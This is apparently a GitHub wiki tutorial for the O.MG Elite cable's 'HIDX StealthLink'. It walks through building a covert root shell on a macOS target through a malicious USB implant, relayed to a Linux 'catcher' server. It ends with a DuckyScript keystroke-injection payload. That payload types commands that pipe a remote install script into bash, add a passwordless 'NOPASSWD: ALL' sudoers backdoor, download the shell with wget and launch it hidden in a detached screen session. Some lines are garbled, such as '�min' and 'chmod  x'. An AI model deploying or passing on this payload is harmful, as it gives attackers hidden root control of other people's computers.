Skip to content

HIDX StealthLink macOS Python Shell

Jump to bottom
Wasabi Burns edited this page Jan 3, 2024 · 5 revisions

HIDX StealthLink - macOS Interactive Shell

1. Getting Started

What you will need:

  • A Linux "Catcher" server running Python3.
  • A macOS "Target" host.
  • A O.MG Elite Device running the the latest v3 Firmware.
  • A Wireless Network accessible to both the O.MG Device and Linux "Catcher" server.

image

2. Configure Catcher Server

  • Please ensure that you have a Linux server with Python3 installed, and connected to your network. This will serve as our "Catcher" server. You will need to have a minimal understanding of Linux and the Terminal.
  • Please note the IP Address of your Linux server, as you will need this later in Step 3. You can get this via the command: ip addr list
  • Verify that your Linux server has Python3 installed, via the command: python3 --version
  • If your Linux server does not yet have Python3 installed, you may be able to install it via the command: sudo apt install -y python3 python3-pip (Note: If this does not work, please review how to install software on your choice of Linux distribution.)
  • Download the following script to your server, via the command: curl -O https://raw.githubusercontent.com/O-MG/O.MG-Firmware/stable/tools/HIDX/python/stealthlink-client-universal.py
  • You may now start the server, via the command: python3 ./stealthlink-client-universal.py 0.0.0.0 1234
  • You should now see the following message to show the server has started: [*]Server Listening on 0.0.0.0:1234
  • Later in Step 3, after the O.MG Device connects to your "Catcher" server, you should see a similar message to the following:
    [ ]O.MG Device connected from: 192.168.1.151:9134

3. Configure O.MG Device

Please ensure that you have an O.MG Elite Device running the the latest v3 Firmware. If you are not sure, please update your O.MG Device via the WebFlasher.

Connect to the WebUI of the O.MG Elite device, and click on the About button in the header bar of the page and ensure you see "Elite" in the about page.

Configure HIDX

First, you should configure your HIDX Settings.

Within the O.MG WebUI Header Bar, click on the Settings button, and then the USB button beneath.

Within the section: HIDX Settings:

  • Enter the Linux "Catcher" server IP Address obtained in Step 2
  • Enter the Server Port Number: 1234
  • Click on the HIDX AutoStart on Boot button
  • Click Change Settings
omg-webui-settings-usb

Configure WiFi

You should configure your O.MG Device to connect via Station Mode to your Wireless Network.

  • Within the Settings Menu, click on the NET button.
  • Change the WiFi Mode to Station.
  • Enter your Wireless Network's SSID and Password.
  • Click "Change Settings"
omg-webui-settings-net

Your O.MG Device will now reboot, and will attempt to join your Wireless Network. At this point, on the Linux "Catcher" server, you should see a message in your Terminal similar to this: [ ]O.MG Device connected from: 192.168.1.151:9134

4. Testing on Target Host

For this step, we will manually setup the Target Host to get a feel for how everything should work. Later, we will automate this process with a payload.

For this tutorial we'll be using macOS 13.5 Ventura installed with brew installed (https://brew.sh/)

  • We will need to download the script from https://github.com/O-MG/O.MG-Firmware/blob/stable/tools/HIDX/python/hidxshell.py You will need to locate the download file and place it in directory (from this example /root/payload, not covered here)
  • Install python3 by running 
    sudo brew update
sudo brew install python3
  • Create the directory ~/payload and enter the directory: 
    mkdir ~/payload
cd ~/payload/
  • Create a Virtual Environment 
    pip3 install libusb_package pyusb
  • Finally to run the python tool (remember we must be root to launch this!) 
    wget <URL HERE>
sudo python3 hidxshell.py
    You should see the following within your Terminal window: 
    <DEVICE ID d3c0:d34d on Bus 020 Address 011>
Found and Connecting to Device: VendorID=0xd3c0 (54208), ProductID=0xd34d (54093). [R:8/S:8]

Now, your macOS device has initiated a Remote Shell via the O.MG Device over USB, and can be accessed by returning to the Linux "Catcher" server.

5. Connecting to the Shell

Go back to the Linux "Catcher" server, and the Python3 terminal window.

You should now see the following:

[ ]O.MG Device connected from 192.168.1.151:9134
HIDX StealthLink Universal Client (type '%quit' to exit)

You can now enter a command within this Terminal window, and it will execute on the macOS host.

$ whoami
root

6. Automating with a Stage 1 Payload

This needs to be launched from a root shell. A standard user with sudo will cause a sudo prompt which may cause issues, to avoid this run sudo before hand if you need a standard user.

DUCKY_LANG US
DELAY 2000
META SPACE
DELAY 500
STRINGLN terminal
DELAY 500
STRINGLN nano ./setup.sh
DELAY 1000
STRINGLN #!/bin/sh
STRINGLN /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
STRINGLN brew install python3 python3-pip
STRINGLN python3 -m ensurepip
STRINGLN mkdir ~/payload && cd ~/payload/
STRINGLN pip3 install libusb_package pyusb
STRINGLN echo '�min ALL=(ALL) NOPASSWD: ALL' > /etc/sudoers.d/hxs
STRINGLN wget https://raw.githubusercontent.com/O-MG/O.MG-Firmware/stable/tools/HIDX/python/hidxshell.py
CTRL x
STRINGLN y
STRINGLN chmod  x setup.sh && ./setup.sh && rm ./setup.sh
DELAY 2000
STRINGLN screen -dmS hxs python3 hidxshell.py

This will launch a screen session headlessly. From here you can follow the previous section on connecting to the shell interactively.

Clone this wiki locally